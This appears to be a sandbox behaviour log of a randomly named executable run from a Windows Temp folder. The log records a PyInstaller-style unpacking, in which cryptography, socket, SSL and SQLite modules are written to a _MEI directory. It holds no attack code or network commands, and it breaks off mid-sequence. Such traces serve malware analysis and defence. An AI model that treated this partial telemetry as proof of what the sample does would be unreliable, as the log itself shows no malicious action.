Module Get Filename module_name = api-ms-win-core-localization-l1-2-1, process_name = c:\users\eebsym5\appdata\local\temp\vkvmtnchwv3w.exe, file_name_orig = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096 True 1
Fn
Environment Get Environment String name = _MEIPASS2 False 1
Fn
Environment Set Environment String name = _MEIPASS2 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 512, size_out = 96 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 1024, size_out = 1024 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 512, size_out = 408 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 16384, size_out = 16384 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp, type = file_attributes True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802, type = file_attributes False 1
Fn
File Create Directory C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802 True 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._AES.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._AES.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._AES.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._AES.pyd, size = 28672 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._AES.pyd, size = 512 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 16384, size_out = 16384 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._DES3.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._DES3.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._DES3.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._DES3.pyd, size = 53248 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Cipher._DES3.pyd, size = 1536 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 2
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Hash._SHA256.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Hash._SHA256.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Hash._SHA256.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Hash._SHA256.pyd, size = 8192 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Hash._SHA256.pyd, size = 2048 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 2
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Random.OSRNG.winrandom.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Random.OSRNG.winrandom.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Random.OSRNG.winrandom.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Random.OSRNG.winrandom.pyd, size = 8192 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Random.OSRNG.winrandom.pyd, size = 1536 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 2
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Util._counter.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Util._counter.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Util._counter.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Util._counter.pyd, size = 8192 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Crypto.Util._counter.pyd, size = 2048 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Microsoft.VC90.CRT.manifest, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Microsoft.VC90.CRT.manifest, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Microsoft.VC90.CRT.manifest, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\Microsoft.VC90.CRT.manifest, size = 1050 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 40960, size_out = 40960 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ctypes.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ctypes.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ctypes.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ctypes.pyd, size = 90112 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ctypes.pyd, size = 3072 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 475136, size_out = 475136 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_hashlib.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_hashlib.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_hashlib.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_hashlib.pyd, size = 1011712 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_hashlib.pyd, size = 3072 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 20480, size_out = 20480 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_socket.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_socket.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_socket.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_socket.pyd, size = 45056 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_socket.pyd, size = 3072 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 20480, size_out = 20480 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_sqlite3.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_sqlite3.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_sqlite3.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_sqlite3.pyd, size = 49152 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_sqlite3.pyd, size = 2560 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 671744, size_out = 671744 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ssl.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ssl.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ssl.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ssl.pyd, size = 1404928 True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\_ssl.pyd, size = 1024 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 36864, size_out = 36864 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\bz2.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\bz2.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\bz2.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\bz2.pyd, size = 69632 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\bz2.pyd, size = 3072 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\main.exe.manifest, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\main.exe.manifest, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\main.exe.manifest, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\main.exe.manifest, size = 1008 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 65536, size_out = 65536 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcm90.dll, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcm90.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcm90.dll, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcm90.dll, size = 225280 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 155648, size_out = 155648 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcp90.dll, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcp90.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcp90.dll, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcp90.dll, size = 569344 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcp90.dll, size = 336 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 315392, size_out = 315392 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcr90.dll, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcr90.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcr90.dll, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcr90.dll, size = 651264 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\msvcr90.dll, size = 1872 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 57344, size_out = 57344 True 1
Fn
Data
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pyexpat.pyd, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pyexpat.pyd, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pyexpat.pyd, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pyexpat.pyd, size = 135168 True 1
Fn
Data
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\pyexpat.pyd, size = 3072 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 1200128, size_out = 1200128 True 1
Fn
File Read filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, size = 4096, size_out = 4096 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll, desired_access = FILE_READ_ATTRIBUTES, file_attributes = FILE_FLAG_BACKUP_SEMANTICS, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE, FILE_SHARE_DELETE False 1
Fn
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll, type = file_type True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll, size = 2629632 True 1
Fn
File Write filename = C:\Users\EEBsYm5\AppData\Local\Temp\_MEI29802\python27.dll, size = 2048 True 1
Fn
Data
File Create filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE True 1
Fn
File Get Info filename = C:\Users\EEBsYm5\AppData\Local\Temp\vKvMTNchwv3w.exe, type = file_type True 1
Fn
